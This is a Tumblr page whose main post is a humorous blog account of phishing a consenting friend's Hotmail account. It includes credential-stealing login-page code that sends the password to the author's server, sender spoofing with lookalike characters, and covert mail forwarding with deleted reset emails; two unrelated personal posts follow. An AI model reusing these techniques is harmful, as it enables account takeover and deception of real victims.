Or maybe you're thinking of someone sending an email that says "[heavy breathing] pls clikc on my urls http://click.here.to.get.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe"
But with nothing more than paperclips, chewing gum, a single fidget spinner, and an advanced psychology degree, we can not only steal Diana's password, but do it without Diana realising she's been tricked.
Hand-crafting artisanal phishing emails to sell at the Sunday markets
Let's write down what we want to do:
Get Diana's email password
Don't let her realise that the email is not legit
Hmm I guess there were only two dot points uhh sorry that doesn't seem worth having dot points at all ummmm
So anYwAy the trick to phishing is that you don't want to engage the victim's attention. You want them to interact with your email mindlessly, without thinking it's a big deal. Kinda like how you click through email notifcations from Twitter (or anything that sends you email notifications) without really thinking about the email, because you're thinking about what awaits on the other end.
The other way, rather than distracting the victim, is to misdirect them. You give them something that's way more interesting to pay attention to than your dodgy link. Common examples of this include emails that say "OMG your account has been HACKED, log in here to fix it".
But of course, you log in to a fake website which steals your password.
Wow actually that sounds pretty12 easy13 doesn't it? Let's try that then.
I'll make an email that says "Your Microsoft Account Has Been Hacked And Uh If You Don't Log In Now It Will Get Deleted So Uh Yeah You Better Log In".
Instead of designing my own legit-looking Microsoft email, it's easier to just copy one that Microsoft has already made. I search my hotmail account14 for an automated email from Microsoft.
I use the incredibly cutting edge "Inspect Element" feature of the popular hacking software, Google Chrome, to edit the text of the email but keep the look. As I right click and hover over "Inspect Element", my laptop instantly explodes, I get root access to Microsoft, I'm added 50 times to every NSA watchlist, my text permanently changes to green-on-black, and I'm accepted to DEFCON.
Now it looks like this:
I can't send the email from my email account, because I'm not a total amateur. I use the popular hacking tool The Microsoft Sign Up Screen to make the hotmail account "[email protected]". If you look closely, "account" is spelled wrong. I used "msft" because it wouldn't let me include the word "microsoft".
I try to register an account with first name "Microsoft" and last name "Account Team". The signup form doesn't let me. Blast. Thwarted by Microsoft lackeys. Probably, Microsoft doesn't let you have "Microsoft" in your account name to prevent, uh, exactly what I'm doing. Hmmm. I don't really want to have a typo in the name, like "Micorsoft", since Diana might notice that.
Instead I, a level 8 Wizard, cast a spell to swap the "o" characters in "Microsoft" for a special unicode character (like an emoji but much worse) that looks exactly like an "o". It's not, of course, it's our old friend, the Greek letter "Omicron". Here's the two pals side-by side:
οo
Awww, just look at 'em having a blast. These little guys might look different in the font your device is using, but in the hotmail web UI font they look juuuust right👌.
So now, my account's name isn't "Microsoft", It's "Micr[omicron]s[omicron]ft", according to the code that checks whether you have a valid name when you sign up for an account.
I'm sure you're wondering how this whole process ends up with me getting Diana's password, laughing manically in my comically giant leather chair. After she clicks the link in my legit looking email, she'll be asked to log in15. The page she goes to will look just like the Hotmail login page, but it will really be a copy that sends the password to me.
How can I make such a page? Well I'll clone the real page, register a domain that looks similar to login.live.com, host my cloned page there, and so on. Juuust kidding, the static website hosting service Aerobatic happens to also be an excellent phishing service.
I can register [anything].aerobatic.io, and deploy my static HTML to that domain with their command line tool for free.
Shout outs to Aerobatic for the smooth smooth phishing UX. Use the referral code DIANA to be immediately reported to the NSA.
I copy the existing login.live.com page, and pre-fill [email protected] in the "email address" field. I deploy this page extremely trivially to login-live.aerobatic.io, and equip my fourth pair of sunglasses (don't worry I've earned it). This almost looks right, but the real Hotmail login form has a bunch of stuff after the / in the URL, so I copy/paste some of that good stuff too16.
Here's the exact URL, if you're interested. Also if you're not interested. It's gonna be there either way.
https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin
Perfect17. This looks similar enough to fool a cursory glance, and that's all we need baybee. Maybe she'll think "why do I have to log in again? I'm already logged in to my email?", but the email asks for a "Secure Login" (whatever that is).
Here's what the login page does:
// When the Login button is clicked or Enter is pressed $('#passwordForm').on('submit', function() { var password = $('#password').val(); // Create an image with a URL that points to my website. // The browser will request this URL in an attempt to load the image (which will fail since that URL doesn't exist) $('body').append('<img src="a-website-i-own.com/DIANA?'%20+%20password%20+%20'" alt="image">'); // Wait one second to simulate loading time (adjust to 0.1s if you don't live in Australia sigh), and then go to the real Hotmail login page. // Diana will already be logged in, so this will seem to her exactly like she's just logged in to hotmail. window.setTimeout(function() { window.location = 'login.live.com' }, 1000); return false; }
This works by sending her password to me when she clicks "log in". The password is sent a website of mine. Then I send her along to the real Hotmail, so it looks just liked she logged in. The website logs everything that gets sent to it, so I can then search my logs for "DIANA" to find the log containing the password.
This is all what I'm hoping for, anyway. The email says she has 48 hours to comply to create time pressure. Telling you that you have to do something right now is a common tactic to make you think instinctively and irrationally.
I login to my fake "Microsoft Account Team" hotmail account, send the email to [email protected] and wait for her to have herself a red-hot browse.
About 12 hours later, I check my logs to see if she's typed her password.
She doesn't.
I wait another 12 hours.
Still nothing.
I send the email again, wincing slightly, this time saying she has 24 hours.
Still nothing.
Well damn
I guess that didn't work. She must have just ignored the email as uninteresting18
I try to think of non-phishing ways to get her password but really phishing is just too good. The nice thing about being the attacker is that you can put your eggs in many baskets. Diana has to defend against all of my eggs, and I've got baskets for days. Time for round 2.
Sniper scope targeted phishing blap blap
I reach under my desk, unwrap a parcel addressed to "DIRECTOR OF CYBER, NSA", slide out a yellow and black canister labelled "CHINA", break open the safety seal, and use safety tongs to extract the following red-hot phish.
This time, instead of using a generic idea that would work on anyone ("suspicious account activity"), we'll make something special just for Diana. Kinda like hand-knitting a beanie, but comparatively less wholesome.
I Google "google docs microsoft equivalent" and come across I dunno SkyDrive or SkyDocs 365 Pro or something or OneDrive look I dunno just look it's Google Docs but Microsoft so good enough for me.
I make a convincing looking resume (in Google Docs, of course) and copy it into a OneSkyCloudDrive 364/2 Days: Final Remix HD+ Doc.
Let's play: who's gonna send this doc to Diana?
I find a local company that's likely to legitimately want to talk to Diana, and search for a recruiter who works there on LinkedIn. I make someone with the same first name, but a different last name as a real recruiter from this company19.
I make a fake gmail account called Kathleen Wheeler, using a stock photo of a middle-aged western woman as the profile photo.
Here's what Kathleen is going to email Diana.
Looks legit riiiight?
The questions at the end are just some garbage I made up, but the point of them is to distract Diana right after she reads the "click here".
I put Diana's real phone number at the end to make it more convincing. This email is obviously meant just for her. It also makes sense for the phone number to be there, since presumably whoever listed Diana as a referee gave the phone number to Kathleen.
At the time she types her password, we want Diana to be thinking of what's on the other side of the login screen.
The delicious bait here is that this email says "someone said they know you", and you have to read the resume to find out who. Aw, but the resume is behind a pesky link. ~Guess you better just click on it~. LinkedIn also does this in their, um, "engagement" emails which say things like "you have 2 new messages", but not who they're from or what they say.
When Diana clicks on the link to the "resume", it will take her to the same fake login page (with her email pre-filled) as before. When she types anything in the password box, the site will wait one second and then send her to the Microsoft Google Doc™. The one-second wait is to simulate Australian internet speeds HAHAHAHAhahahahahah this sucks
She'll find that she doesn't know the person, probably because they're completely made up. They have work experience at real workplaces nearby, and went to the same university as Diana at around the same time, so hopefully their resume passes a cursory glance20.
Finding an unfamiliar resume is a sufficient, but not particularly satisfying conclusion to the adventure of the weird email from Kathleen. But of course, by then it's too late, I'm sitting in my ivory tower surrounded by passwords.
I make sure to send it during business hours, from "Kathleen""", pull a necklace from under my shirt dramatically, kiss it, look up at the sky, and wait.
Waiting
That night, I check my website's logs for any passwords from my fake Hotmail login form.
- - [[date]:16:32:30 +1000] "GET /DIANA?qwerty1 HTTP/1.1" 404 4702 "https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=http...." "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
"Got it!"
..... is what I think, at first.
Particularly keen readers will have noticed that the password Diana has typed into my fake Hotmail login page is... the same password as we found for her in the Tumblr database.
This is not her Hotmail password, and everything is terrible.
From this we can draw two conclusions:
Diana doesn't know what her Hotmail password is
She now thinks her hotmail password is qwerty1, since she typed it into my fake login page which accepts any password, and it worked
I almost gave up at this point, but a last-minute burst of desperation/frustration/final destination helped me work up the courage to have another shot here in Act 3.
By this point my fake Microsoft Account Team email account has been soft-banned by the good people at William Gates Inc. for sending so many obvious phishing emails. I have to prove I'm a human and add my phone number to the account, and then it unlocks and I can edit the Microsoft Google Doc.
I hastily make a new fake resume of significantly lower quality than the first one, and make a crucial change to my fake login page.
My fake login page now says "wrong password" no matter what you type in the first two times you try typing something. If you type qwerty1, then the password counter doesn't go up21.
What do people do when they get a "wrong password" error? Try all of the 3 or 4 passwords they use for everything, of course.
I want to try and get Diana to type qwerty1, get a "wrong password" error, and then just unload all her passwords into my form.
Diana replied to my failed email with "sorry I don't know this person", and so Kathleen replies with, "wrong resume lol, here's the new one" even though this makes zero sense in the context of our email exchange. I'm hoping Diana will just be busily checking the email on her phone and not really notice this discrepancy.
I use a different font from the "form" when typing as Kathleen to make it look like this is a form that gets copy/pasted to every candidate. This makes Kathleen seem like she does this all the time in her big bustling, 100% real office. I also do my best to imitate the tone of a polite but stressed out office worker. You can almost hear the office politics. It's called method acting.
Time to stressfully wait for Diana to check for her email again, so now would be a good time to read out some donations.
Hours later
It works.
108.162.249.169 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702 "https://docs-login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
I get only one password from Diana (typed multiple times), but it's different to the last one I got (qwerty1)22.
I wait until she's asleep based on her Facebook Messenger last active time and log into her email using the elite hacking method of typing her password into the box.
The reason I waited until she was asleep was in case Hotmail emailed the account saying "New Sign In". It doesn't, and I'm rewarded with her email inbox screen in its full glory.
Angels sing softly above me. A small yellow bird lands on my shoulder and begins to chirp softly. I get several emails from the bullies in high school - they're really sorry and they've done a lot of soul searching and they want to make it up to me and I should expect premium fruit baskets on my doorstep in the coming months. Global warming halts.
"But that would never work on me"
It would tho.
Perhaps some of you in the audience are thinking "Wow, this Diana person must be pretty dumb to fall for that. Good thing I'm a web browsing prodigy with a colossal brain and many opinions, so that would never happen to me."
The thing is, right now you're very alert, because you're reading a blog post about hacking. If you were just reading your email, half-paying-attention on a train as normal, security wouldn't likely be on your mind. If sending trick emails is good enough for whoever the NSA, are emailing, then it's probably good enough to work on you and me.
I guess what I'm saying here is "don't go shaming phishing victims plz".
Anyway sorry back to haͅck͐i̥n̏g̜
Part 4: HACKER VOICE I'M IN
I immediately try Diana's email password (wertyu2) on her Facebook, Twitter, LinkedIn, iCloud, and on her other email addresses. None of them work because I've chosen someone with slightly above average personal security to target.
The obvious next step is to forward all her email to me (so I don't have to keep logging in to her email). Before I set up email forwarding, I try it out on a hotmail account I control. I'm testing to see if setting up "forward all your email to this address" sets off any notifications I'll have to delete, or notifies you in any other way.
In gmail, when you forward all your mail to another email address, the other address gets emailed a code, and also a big red bar appears on your gmail inbox saying "you're sending literally all of your email to this address FYI" for 7 days.
I type in my email address into my test hotmail account, and click "forward all my mail here pls". It saves. I check both email inboxes for a notification email. There isn't one. I've just backdoored this email account and no fuss has been made whatsoever. OH well at least hotmail has NoMansSkyDrive 2.8 Remastered XL Online or whatever.
An interlude from Diana
Diana replies to my email saying she doesn't know this person either. She's a little suspicious, so I try and say something that will close the conversation.
Diana doesn't reply.
Hey remember how you can search email?
Now that I have Diana's email password, I want to search her email for more passwords, and use those passwords to get more, and so on, like a REAL hacker.
Try going to your email and searching for "password". Betcha there's passwords in there.
In Hotmail, when you go to search something, the last 5 searches you've done pop up as suggestions.
This means that if I search for "password", Diana will notice "password" in the search history. That would be a really lame way to get caught.
To get around this, I: * Wait until Diana is asleep * Write down her last 5 searches * Search for "password" * Look at the results * Search for her last 5 searches again, in reverse order
Since only the last 5 searches are shown, by repeating the searches in reverse order, the search history looks exactly the same.
Much to the disappointment of the live studio audience, I don't find anything particularly useful. I find the two passwords I already know (qwerty1 and wertyu2) several times, and one other password which I again try on all her accounts, but doesn't work </3.
I hang out in Diana's email for several months. Every so often I check it. I find her signing a contract for a job, and so I get her passport number, signature, phone number, bank account number, and basically everything I'd need to impersonate her. I don't really232425 want to impersonate someone's government-issued ID, so I leave this alone.
At one stage, I'm browsing through hit political discourse platform and opinion conveyor belt twitter dot com, and I notice Diana tweet something along the lines of "Finally spent my day off consolidating my 4 email accounts into 1, feels good to be organised".
I panic a little. Have I been found out? I log in to [email protected] (which still works, thankfully) and see that all her emails have been archived. I poke around in the email forwarding settings, and I see that things have changed. Her email is no longer being sent to my email address, it's being sent to [email protected] (presumably the new email that Diana now forwards all her mail to).
This raises an important question. How did Diana not notice my email address in the "forward all mail to:" box? Did she see it, and just mindlessly delete it?
(When I interview her after all this, she says yes, that's exactly what she did.)
What now?
Normally it would end here. Mission accomplished. I'm in control of her email. I could cause catastrophic damage to Diana's life if I wanted to (I don't btw). There's potential for endless gags, limitless goofs, unlimited japes, infinte jests, etc.
But.. it seems like an awful shame to just... leave. That's why I start work on a little' somethin' called
Operation Luigi
Everybody just LOVES Mario's green friend Luigi! He's a Certified Good Boy! Just look at that boyish charm.
Why not brighten up YOUR social media presence with this game boy?
Well gee I'm sold after that delightful interlude from our sponsor, The Nintendo. Let's get Diana some uncut, Colombian Luigi.
Step 1: Get in to her Twitter and LinkedIn
So, I want to:
Get access to Diana's Twitter
Not lock Diana out
Not alert Diana that I'm up in her stuff
I could just phish her again for these passwords, but I'm already a salty old fisherman by this point.
Since I have access to her email, I could reset her Twitter password. The problem is, when you reset your Twitter password, you get logged out of Twitter in Chrome, the Twitter app, and anywhere else you might be logged in. So you have to retype your new password. One of my rules was that I wouldn't interrupt Diana's life, so I need her to be able to log back in to Twitter when I force her to log out.
I come up with a simple 8-step plan to do this, with 4 easy repayments of 2 steps.
Wait until Diana is asleep
Disable Diana's email forwarding
Go to Twitter and reset her password
Click the password reset link that gets emailed to her
Set her password to qwerty1
Delete the password reset email
Delete the "New Twitter Sign In" email
Re-enable email forwarding
The combo move in this is setting her password to qwerty1. When I phished her email password, she tried to log in to her email with qwerty1 even though that's not her password. This tells me that she thinks her password for everything is qwerty1, or at least, that's what she'll try if she's not sure. The technical term for this is next-level mindgames💻💻💻.
I do the steps above, and I'm now logged in to Diana's Twitter account. I tigheten up her Twitter security settings because I'm a Good Boy. I HOPE that Diana will be able to log back in as well, and not wonder why she suddenly got logged out. I wait stressfully for her to tweet something, and after a day or so she retweets a cute doggo, so we're good to go.
Now I want to do the same thing on popular dating website LinkedIn. This will involve signing Diana out of LinkedIn on all her devices, and I don't want her to get too suspicious, so I wait a week. I do the same process as with Twitter. This time I don't even wait until Diana is asleep, because I'm young and invincible.
As I'm setting Diana's password on LinkedIn back to qwerty1, LinkedIn doesn't let me.
Is this because qwerty1 was a password present in the LinkedIn hack in 2012? Or because it's just a common password? For a brief moment I panic, but then I realise I can just set Diana's password to her email password, wertyu2.
Astute readers will have noticed this little guy in the screenshot above.
LinkedIn is asking me if I'd like to log out of Diana's LinkedIn account on all devices while I'm resetting the password. That's REAL nice of you to offer old mate LinkedIn but I'm absolutely golden as it is in terms of logouts so don't even worry about it I'll be just fine how it is NO REALLY don't trouble yourself, I'm sure your CPU cycles are busy displaying everyone's 6000 word Thinkpieces about "Cyber" for "Non-technical Business Decision Makers".
Yeah so I submit that form 100% checkbox-free, and Diana remains logged in to LinkedIn on all her devices, none the wiser.
Step 2: Bring in the green boys
I enlist the help of a talented friend to photoshop everyone's #1 boy next door Luigi subtly into Diana's profile picture on Twitter, like a green guardian angel.
I can't show you Diana's pictures, so here's me doing similar photoshops to Your Boy And Mine, Five Time Celebrity MasterChef Winner And The Inventor of Bitcoin, Give It Up For Dr. Barack Obama Everybody:
At about this time I tweet about our sweet green boy so that if Diana sees her guardian angel Luigi, she'll know it was me. This is like my calling card except.... well it's not really like a calling card it's pretty dorky to be honest but just LOOK at that wholesome lad, you just KNOW he'd help you fix a flat tyre, and he'd just be too gosh darn polite to correct you if you said "thanks green mario" so really if you think about it I guess it IS like a calling card.
Next up I log into her LinkedIn account, get overwhelmed by her 15 LinkedIn notifications, 7 new profile views, 11 new Key People To Bother, and several pop ups telling me about new features I can use to invite people to join my professional network on LinkedIn™®©. Then I change her profile picture to my really good version.
For about a week, Diana continues her Twitter and LinkedIn(?) usage whilst being silently Luigi'd. Diana goes on viewing what I can only assume to be the sharpest international political discourse on Twitter, and getting slightly more LinkedIn profile views from observant recruiters who are also fans of the hit 2001 ghostbusting game, Luigi's Mansion.
Well that just about wraps up Operation Luigi. Glad that's all done and dusted.
Although...
I'm basically a Luigi technician at this point, and it would be a shame to let all that work go to waste. So let's just do
~one more thing~
Operation Waluigi: A dark turn for mature audiences
Waluigi, true to his character, is much more direct.
Damn RIGHT this new profile strength is "Advanced."
Please enjoy these half-baked opsec-enabled26 tweets27.
I also make Diana follow a bunch of Waluigi fan accounts (there are a lot), Nintendo of America, and @EmojiAquarium because it's a damn good account.
Part 5: Epilogue
Diana likes her new Waluigi life so much she keeps it all up there, and even changes her Facebook photo to a Waluigi'd one.
I meet up with her and ask her about her side of the story a few days later.
Here are some choice quotes:
"I've since listened to a lot of Waluigi songs" "Waluigi is the ultimate symbol of postmodernism, he exists only as a foil"
I ask her "How do you think I did it?". She says I must have hacked her email and reset her Twitter password, but she has no idea how I hacked her email.
When I show her the email chain with Kathleen on my computer her jaw drops for several seconds.
"You catfished me!"
We go back to the same ramen place after the interview. The credits roll.
"wait but i am very afraid after reading this blog post, how do I not get 360 noscope hacked like diana tho"
Hey kids, it's me, "Alex". We've had a lot of fun today, but now it's time to talk about the real issues. The moral of this story is that it's really easy for someone else to know your password. Fret not, for you are young and extremely online, and it's not too late for you yet.
Step 1: Go to https://haveibeenpwned.com and type in your email address. This doesn't actually do anything, it's just to instill sufficient fear in you.
Step 228: Go to your email and enable "Two-step Authentication". You can go to https://www.google.com.au/landing/2step if you use gmail. If you use Hotmail then I dunno, there's probably like a SkyCloud 360 X LIVE subscription you can buy that lets you do it.
Now, as well as your email password, you also type in a code from an app on your phone. Or you can have the code SMSed to you on your pastel-pink flip phone if you wanna relive the 90s29.
If Diana had Verified Good Content Two-step Authentication turned on, then I would have had to get a two-factor code AND her password. I would have had to either:
Phish the code as well as the password (but the code expires in less than 60 seconds)
Physically go to the same place as her, connect to the same WiFi, and steal her browser session
Email her a Word Doc with a macro in it that gives me control of her laptop, and steal her browser cookies from it
Call up her phone provider and trick them into pointing her phone number at my SIM card
All of these are more work and higher risk, and so hackers often just move on to lower hanging fruit. That's you in this situation. You're the delicious fruit. And the hackers are.... giraffes? Yeah. Watch out for giraffes.
Freshly baked shoutouts to My Absolute Homeslices for being my blog-review senpais, Diana for being chill, and to the hacking software released at DEFCON 25: Aerobatic dot io
If you want to talk to me about this, hit me up in the tweet zone (@mangopdf) or direct your browser to mango.pdf.zone
A careless mistake ↩︎
Obviously the best way is to not give permission to meeeeeeeee😎 ↩︎
I found her LinkedIn by just googling her name #pwned ↩︎
wait did he just say "hacker voice I'm in"? ↩︎
I haven't realised yet that successfully resetting Diana's iCloud password would lock her out of her account and violate our agreement. This is because I'm a weapons-grade bozo. ↩︎
On haveibeenpwned.com, Diana's email address shows up in a data dump from this website. It's a game of some sort? ↩︎
Later when I interview Diana, she says "I use exclusively Google Docs", so I was right! No comment about the avocado thing. ↩︎
I'm not making these up, these are real words that real hackers use I swear. ↩︎
Diana didn't have LinkedIn in 2012, so she's not in the list. But some of the 20 people who had the same password as her sure did. ↩︎
tag urself lol ↩︎
I also try guessing what her password could be based on the password I already have for her (qwerty1) but it doesn't work. ↩︎
low ↩︎
effort ↩︎
From 2002 do NOT @ me ↩︎
This makes no sense, since she'll be reading her Hotmail, and then asked to log in to the same thing she's already reading, but NON-fake websites have bad enough UX that this is believable. ↩︎
I steal all that good stuff after the URL from the Google sign-in page ;>_> ↩︎
Awkwardly, Hotmail changed its login screen shortly before this blog post came out. It used to look like that I swear. ↩︎
There are a few reasons this email wasn't attention grabbing. It was automated, from a company (not an actual human), and wasn't specifically about her, but about her account. ↩︎
When I interview her later, Diana says she looked up the company! She even says that getting back to Kathleen was on her to-do list, the poor thing. ↩︎
Months later, I notice I've left a "Lorem ipsum dolor sit amet, consectetur adipiscing elit" as a dot point on the resume. ↩︎
This is a genius suggestion from one of my ~hacker connections~. ↩︎
At this point Diana has been completely gaslighted as to what her hotmail password is, because my phishing site said the wrong password was right, and then said the right password was wrong, and she thinks it's the real Hotmail. ↩︎
I mean it WOULD be pretty funny ↩︎
And wow you could do anything, book flights, get a job, change your name... ↩︎
Just letting any Government Agents reading this know that I did NOT end up doing anything with this and I love democracy. ↩︎
If you really tried you could probably find Diana's Twitter from these. You would then be a hacking genius, binary flowing through your veins, and have a CVE number assigned to your personally. I, a humble wannabee, am relying on your strict ethics to prevent you from, uh, stalking the friend of some guy whose blog post you read. You can do it. I believe in you. ↩︎
Having said that, I don't really have an overwhelming amount of faith in the idea that someone won't try to do that. You can stay chilled out, dear reader, since before this blog was published Diana and I had a nice chat and fixed up her personal security. ↩︎
Password managers like LastPass are also good for giving you unique passwords, but I reckon 2FA is the best effort:security ratio value For Normal People Tee Em. ↩︎
But, this is less secure, since your phone number can still be hijacked. ↩︎
386 notes · View notes
usagi-akachan-moved · 7 years ago
Text
About
You know I've had this blog for three years now and I've never had an about page? Time to fix that.
Who am I?
You can call me Luzon, Kiki, or Søren, whichever fits your fancy. I'm a guy (he/him), and I'm gay and grey-ace. I'm a minor. I'm open to a lot of things, I'm generally more on the do-whatever-weird-shit-you-want-but-keep-me-out-of-it side. As long as you're not directly harming anyone or advocating for it, I'm cool. I am an sfw age regressor, just so you're aware. I draw a lot, my art tag is "my art" (so basic I know), and I have an Instagram @luzonmfjel. I go to arts high school and I'm pretty sure you can tell just from looking at me. I have ADHD and autism and they pretty much dictate every single aspect of my life apparently. I don't monitor my follower count at all so please, if for any reason you need to unfollow or even block me, do so liberally. Much better than sending me whiny messages in my inbox.
What do I like? What do I post?
Lots of anime/manga/visual novels, the like. Current fandoms are listed in my description. All of them are too long to list here.
Guro/gore, now exclusively on my sideblog @hoshigxro
Stim/slime videos. I like kinetic sand and floam the best. Love that Cronch™
Shitposts/general tumblr memes. I follow a select few popular blogs that I reblog from often.
Kidcore/cute aesthetic/pink things
Political stuff sometimes
Some discourse. Opinions can be found below.
Opinions: Note that I am not looking for any discourse. These are just my stances on things clear and simple. Don't like/don't follow/don't come into my inbox and be a bitch. Thanks.
I am:
Pro-humanist
Pro-shipping. All ships, as long as they are fictional.
Pro-love in all its forms
Pro-poly (but anti-cheating. Communication, y'all)
Pro-choice/pro-abortion
Socialist
Pro-kink. All kinks, as long as they are practiced 100% consensually
Feminist (I am a white guy, but I advocate for equality for all and women's rights. If I say something insensitive, please correct me)
Pro-boy
Mentally ill
Atheist
Pro-religion
Pro-ace/inclusionist
Anti-radfem
Anti-TERF/transphobe
Anti-truscum/transmed/any other LGBT exclusionist
Anti-anti shipping
Anti-aphobe/exclusionist
Anti-capitalist
Anti-islamophobia
Anti-nazi/alt-right/white supremacist (that one should be pretty damn fuckin obvious)
Anti-war
Anti-racism
Anti-cringe culture
Just because I'm pro-something tho doesn't mean I am it. Just for the record I am not:
Polyamorous
A kinkster (I'm ace?)
POC
A woman
Thanks for reading!! Remember I'm not doing this to ask for discourse so don't fuckin send me any you dummies. Just putting my opinions in one spot so y'all can be sure if you wanna follow me.
Also I tag "problematic" ships and nsfw, so blacklist those at your liberty. I will also tag anything you need me to, no questions asked, just shoot me an anon! I want this blog to feel safe
2 notes · View notes
sometimesrosy · 8 years ago
Note
So you agree light-skin/biracial people have privilege that can blind them to the needs of other poc? B/c your response to fans pointing out racism in The 100 reeks of privilege. You yourself dismiss poc experiences, speak over them, and tell them their experiences aren't real! The same way whites have to acknowledge privilege, so do light-skin poc. If society sees/reads you as white, that's power. Being biracial & dating men of color doesn't make you woke. Ignoring The 100's racism = privilege.
Btw, I’m over 35, have a PhD in Critical Ethnic Studies, and have been writing and dealing with race all my life. And I’m from a mutiracial family. I can acknowledge my light-skin privilege that blinds me to the realities of other POC & the fact that I need to listen. You dismiss angry fans & tell them they overreact/blow things out of proportion. You claim they don’t know how to read the show. You say it’s just the genre and everyone dies. Excuses white PTB have been using for ever. Privilege.
So, let’s get this straight. I address the issues of MY racial identity, and you think that means I am silencing OTHER people. Standing up for biracial people and interracial relationships means that I am telling others their experiences aren’t real. Having white skin privilege means, apparently that I am not allowed to speak about the bigotry I see within my own community towards a less dominant community within it. Is this what you’re getting at? 
What it seems like you’re saying is, sit down and shut up and let people call me and others racist whether that’s true or not. That saying “wait a minute, you haven’t considered THIS aspect of this story” is dismissing people’s experience. That having an actual conversation about what all these issues means is racist, because to look at other perspectives is “silencing” so therefore you consider it your duty to silence me.
I’m not IGNORING the racism in The 100, and I’m not saying anyone’s experiences aren’t real. I’m unpacking it and examining the complicated issues of racism in the show. You don’t like the conclusions I come to because it doesn’t fit the one, accepted, fake tumblr social justice position. Listen, when all you have is a hammer, everything looks like a nail. 
If you have a PhD in Critical Ethnic Studies, then why didn’t YOU call people on that bullshit colonialist narrative argument? I had to google that to make sure I knew what it was saying. Colonialist narrative, or Post-colonialism, is absolutely an academic term in ethnic studies, with some themes in common with the story of The 100. But it’s not at all what people are saying it is. If there was a colonialist narrative anywhere, it was with Mount Weather who called the grounders savages and thought the ground was their birthright. In fact YES. That does fit the definition. 
Colonialism was presented as “the extension of civilization”, which ideologically justified the self-ascribed racial and cultural superiority of the Western world over the non-Western world. This concept was espoused by Joseph-Ernest Renan in La Réforme intellectuelle et morale (1871), whereby imperial stewardship was thought to effect the intellectual and moral reformation of the coloured peoples of the lesser cultures of the world. That such a divinely established, natural harmony among the human races of the world would be possible, because everyone has an assigned cultural identity, a social place, and an economic role within an imperial colony. [X}
But no one’s calling that racist, are they? Wanna know why? Because the show said they were the absolutely closest to evil that this show ever got!  The vampire nazi colonialists were the villains, and they were white. 
Why did you let that go? That’s your area of expertise. Why did we not see this discussion going around the fandom? What does it mean?  We don’t know, because we only got a few people, scared to speak up, going, “wait, the sky people are refugees. They’re living in a refugee camp.”  Why didn’t I hear your charming academic critical ethnic studies voice bringing up issues of what it means to be a refugee? No? Too complicated? Not black and white enough for you? 
Help me out here, Doctor. Why do you say I’m saying I’m woke because I’ve been in interracial relationships. Those two concepts were not connected. I brought up my personal history to explain my identity when I was talking about the fandom invalidating mixed race people, an issue that you’ve never actually brought up, because you’re too busy trying to invalidate me by calling me racist and privileged.  Laughably implying that I can’t see the other side because I only see MY side, that of a person who comes from both sides. 
I brought up my history and studies and background because you were challenging my right to speak and calling me ignorant about racism, not because I was trying to say I know everything, just to defend my right to speak about my life and my world, and now you’ve decided to tell me about your academic and ethnic background to prove to me that I still have no right to speak. So yeah. Do you think that every time a white woman lashes out at her POC loved one that it is motivated by racism? You should have an opinion on that, with your background. But you never brought it up. You’d rather call me a racist than address the concerns on the table and have open conversation.
Since when, Doctor, did Critical Ethnic Studies turn into pointing your finger at people, calling them racist and then trying to silence them and end the conversation so only one opinion is heard?  Which you’ve been doing to me now for four asks. This is not discussion. This is identity politics, and you are using my identity to try and silence me because I am not POC enough, because I don’t belong and my experience in regards to mixed race families, when TALKING ABOUT MIXED RACE FAMILIES doesn’t count.
You want to talk about race in The 100 or multiculturalism, I have no problem. You want to continue coming into my inbox to tell me I have no right to speak about one of the defining issues of my life because I’m not POC enough, I’m blocking you. 
This part of the conversation is done. You can tell me to shut up all you want, it’s not gonna happen. Not if you call me names, not if you ask me nicely, not even if you argue with logic. Because there is no logic that supports silencing people, any people, especially minorities. And in case you’ve missed it in your discourse, I am STILL a WOC. My experience is part of the POC experience. It is valid.
15 notes · View notes